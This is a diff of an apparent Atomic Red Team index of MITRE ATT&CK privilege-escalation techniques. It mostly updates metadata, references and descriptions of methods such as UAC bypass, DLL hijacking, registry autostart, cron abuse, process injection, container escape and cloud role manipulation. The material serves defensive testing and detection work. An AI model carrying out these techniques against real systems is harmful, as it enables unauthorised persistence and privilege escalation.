       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests:
     - name: Bypass UAC using Event Viewer (cmd)
@@ -34690,7 +34955,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -34724,8 +34989,6 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests:
     - name: Sudo usage
@@ -34843,7 +35106,7 @@ privilege-escalation:
           sudo visudo -c -f /usr/local/etc/sudoers
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -34862,7 +35125,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -34876,7 +35138,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -34903,8 +35164,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -34935,7 +35196,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests:
     - name: Service Registry Permissions Weakness
@@ -34999,7 +35261,7 @@ privilege-escalation:
         name: command_prompt
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -35071,9 +35333,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -35089,7 +35351,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests:
     - name: Add a driver
@@ -35159,7 +35420,7 @@ privilege-escalation:
         elevation_required: true
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -35234,7 +35495,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests:
     - name: HKLM - Add atomic_test key to launch executable as part of user setup
@@ -35307,7 +35567,7 @@ privilege-escalation:
         elevation_required: true
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -35327,9 +35587,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -35349,9 +35614,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -35368,6 +35632,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -35401,7 +35669,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests:
     - name: Add Federation to Azure AD
@@ -35653,7 +35920,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests:
     - name: Modify Fax service to run PowerShell
@@ -35865,26 +36131,7 @@ privilege-escalation:
         elevation_required: true
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -35901,6 +36148,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -35911,9 +36159,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -35921,8 +36173,24 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -36041,7 +36309,7 @@ privilege-escalation:
           '
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -36071,6 +36339,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -36081,6 +36350,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -36089,13 +36359,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -36137,9 +36407,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests:
     - name: Azure AD - Add Company Administrator Role to a user
@@ -36330,7 +36597,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests:
     - name: Print Processors
@@ -36370,14 +36636,14 @@ privilege-escalation:
         elevation_required: true
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -36393,8 +36659,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -36408,7 +36674,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -36434,6 +36700,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -36461,7 +36731,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests:
     - name: DLL Search Order Hijacking - amsi.dll
@@ -36530,7 +36799,7 @@ privilege-escalation:
         elevation_required: true
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -36556,7 +36825,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -36598,7 +36867,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -36676,11 +36944,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -36760,7 +37027,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -36783,7 +37120,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -36831,8 +37168,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests:
     - name: Thread Execution Hijacking
@@ -36878,7 +37213,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -36933,8 +37268,6 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests:
     - name: Application Shim Installation
@@ -37023,7 +37356,7 @@ privilege-escalation:
         elevation_required: true
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -37084,9 +37417,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -37095,7 +37428,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests:
     - name: Add Port Monitor persistence in Registry
@@ -37172,7 +37504,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -37193,7 +37525,6 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests:
     - name: Logon Scripts - Mac
@@ -37214,7 +37545,7 @@ privilege-escalation:
         name: manual
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -37317,7 +37648,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests:
     - name: Shellcode execution via VBA
@@ -37824,7 +38154,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests:
     - name: Deploy container using nsenter container escape
@@ -37993,7 +38322,7 @@ privilege-escalation:
           rmdir #{mount_point}
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -38006,7 +38335,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -38019,7 +38347,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -38049,7 +38376,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests:
     - name: Shortcut Modification
@@ -38127,7 +38455,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
